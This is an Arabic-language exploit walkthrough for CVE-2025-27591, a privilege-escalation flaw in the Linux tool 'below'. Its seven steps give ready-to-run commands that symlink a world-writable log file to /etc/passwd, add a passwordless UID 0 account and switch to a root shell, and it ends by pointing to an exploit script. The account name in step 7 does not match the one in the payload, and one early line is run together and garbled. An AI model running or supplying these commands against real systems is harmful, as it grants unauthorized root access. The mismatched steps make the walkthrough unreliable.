
CVE-2025-27591 هي ثغرة معروفة لتصعيد الامتيازات في خدمة Below (الإصدار < v0.9.0)
belowهذا استغلال بسيط لـ CVE-2025-27591، وهي ثغرة تصعيد امتيازات محلية في أداة مراقبة النظام below لنظام لينكس. تؤثر الثغرة على الإصدارات السابقة لـ v0.9.0 وتنبع من تعيينات أذونات غير صحيحة في النظام. تم اكتشاف المشكلة في يناير 2025 والإفصاح عنها علنًا في 12 مارس 2025 (SecurityOnline, OpenWall). عند تشغيل below باستخدام sudo، قد يسجل الأخطاء في دليل قابل للكتابة للجميع (/var/log/below)، مما يسمح للمهاجمين بإنشاء رابط رمزي لملف سجل إلى أهداف حساسة مثل /etc/passwd.
من خلال استغلال هذا، يمكن لمستخدم غير مميز لديه صلاحية sudo لـ below تصعيد الامتيازات إلى الجذر.
belowbelow record/var/log/below/error_root.log/var/log/below قابل للكتابة للجميعsudo /usr/bin/below record بدون كلمة مرور✅ الخطوة 1: التحقق من أن دليل السجلات قابل للكتابة للجميع
يجب أن ترى:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ الخطوة 2: إزالة أي ملف error_root.log موجود
rm -f /var/log/below/error_root.log
✅ الخطوة 3: إنشاء رابط رمزي إلى /etc/passwd
ln -s /etc/passwd /var/log/below/error_root.log
ثم تحقق باستخدام
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ الخطوة 4: إنشاء ملف حمولة
سيؤدي هذا إلى إضافة مستخدم مهاجم جذر جديد بدون كلمة مرور:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
هيكل الملف
username:password:UID:GID:comment(home/full name):home_directory:shell
الشيء الأساسي هنا هو UID و GID
نحن نضبط UID و GUID على 0 مما يجعل المستخدم مستخدم جذر ومعرف المجموعة = مجموعة الجذر

✅ الخطوة 5: تشغيل كتابة السجل كجذر
هذا هو جوهر الاستغلال.
sudo /usr/bin/below record
من المتوقع أن يفشل هذا الأمر أو ينتهي وقته — لكنه سيحاول كتابة سجلات الأخطاء إلى /var/log/below/error_root.log، وهو في الواقع /etc/passwd.
💡 في بعض الحالات، قد يؤدي هذا وحده إلى إفساد /etc/passwd — لذلك نستبدله بالكامل بعد ذلك.
✅ الخطوة 6: استبدال /etc/passwd عبر الرابط الرمزي
cp /tmp/payload /var/log/below/error_root.log

✅ الخطوة 7: تصبح جذر
su attacker
ستنتقل إلى قشرة جذر، بدون الحاجة إلى كلمة مرور.

python3 dbs_exploit.py
